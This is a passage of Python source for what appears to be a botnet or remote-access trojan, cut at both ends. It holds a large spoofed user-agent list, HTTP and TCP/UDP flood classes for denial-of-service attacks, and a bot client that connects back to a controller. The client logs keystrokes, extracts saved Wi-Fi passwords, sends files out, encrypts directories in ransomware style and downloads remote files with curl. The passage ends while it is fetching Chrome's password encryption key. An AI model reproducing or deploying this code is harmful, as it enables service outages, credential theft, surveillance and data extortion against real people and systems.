'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7',
'Mozilla/4.04 [en] (WinNT; I)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)',
'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc',
'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)',
'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1',
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)',
'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)',
'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)',
'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711',
'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)',
'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1',
'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7',
'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e',
'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5',
'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)',
'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c',
'Lynx/2.8.3rel.1 libwww-FM/2.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)',
'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)',
'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'BrowserEmulator/0.9 see http://dejavu.org',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624',
'iCCrawler (http://www.iccenter.net/bot.htm)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50',
'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'msnbot/0.9 (+http://search.msn.com/msnbot.htm)',
'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)',
'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)',
'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)',
'Opera/8.50 (Windows NT 5.1; U; de)',
'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322',
'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)',
'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)',
'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
if not self.stopatk:
try:
code = 0
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
except:
pass
def TCP_req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
except:
pass
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
while True:
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
def UDP_Flood(self):
while True:
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
class Bot:
def __init__(self, ip, port, key):
self.ip = ip
self.port = port
self.msg = ""
self.name = os.popen("whoami").read().strip()
if sys.platform == "win32":
self.desktop = f"C:/Users/{os.getlogin()}/Desktop"
elif sys.platform == "darwin":
self.desktop = f"/Users/{self.name}/Desktop"
else:
self.desktop = f"/"
self.logging = False
self.file_saving = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
break
except:
self.connection.close()
time.sleep(1)
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
self.fileeditor = False
time.sleep(1)
msg = socket.gethostname()+" "+self.getip()+" "+os.getlogin()+" "+sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG")
self.recv_thr = threading.Thread(target=self.recv)
self.recv_thr.start()
self.conntest = threading.Thread(target=self.conn_test)
self.conntest.start()
self.key = key
try:
self.fernet_session = Fernet(self.key)
except:
self.fernet_session = None
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self, msg):
try:
self.connection.send(msg.encode())
except:
self.connection.send(msg)
def recv(self):
while True:
try:
self.msg = self.connection.recv(1024)
try:
self.msg = self.msg.decode()
except:
pass
self.run_cmd()
except:
pass
def on_press(self, key):
if self.logging:
try:
self.send("!sendkey " + str(key))
except:
pass
def on_release(self, key):
pass
def start_logging(self):
try:
with Listener(on_press=self.on_press, on_release=self.on_release) as listener:
listener.join()
except:
pass
def obtainwifipass(self):
if sys.platform == "darwin":
self.send("This bot is on a Apple-based product. Unable to get wifi passwords!")
else:
item = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i, "key=clear"],
capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)", item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass.strip()}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
return main_msg
def openfile(self, file):
try:
if sys.platform == "darwin":
os.system(f"open {file}")
else:
os.startfile(file)
except:
pass
def changedir(self, dir):
try:
os.chdir(dir)
except:
pass
def getinfo(self):
msg = f'''
IP: {self.getip()}
CWD: {os.getcwd()}
USERNAME: {os.getlogin()}
OS: {sys.platform}
'''
return msg
def returnsecondstr(self, msg):
instruction = msg.split()
secondstr = instruction[1]
return secondstr
def rmdir(self, dir):
try:
shutil.rmtree(dir)
except:
pass
def rmfile(self, file):
try:
os.remove(file)
except:
pass
def mkdir(self, dirname):
try:
os.mkdir(dirname)
except:
pass
def listdir(self):
try:
dirlist = os.listdir()
result = ""
item = 0
dir_count = len(dirlist)
for i in dirlist:
if item == dir_count:
result += f"{i}"
else:
result += f"{i}, "
item += 1
return result
except:
pass
def sendfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
time.sleep(5)
self.send("finished".encode())
except:
pass
def file_content(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
except:
pass
def encdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(i, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(i, 'wb')
file.write(dec_content)
file.close()
except:
pass
def encfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(filename, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(filename, 'wb')
file.write(dec_content)
file.close()
except:
pass
def getfrinternet(self, src ,filetocreate):
try:
output = os.popen(f"curl {src} -o {filetocreate}").read()
self.send(f"Created {filetocreate} into {os.getcwd()}")
except:
pass
def conn_test(self):
connected = True
while True:
try:
if connected:
self.send(" ")
time.sleep(1)
except:
connected = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
msg = socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG".encode())
time.sleep(1)
connected = True
break
except:
pass
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
def get_encryption_key(self):
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
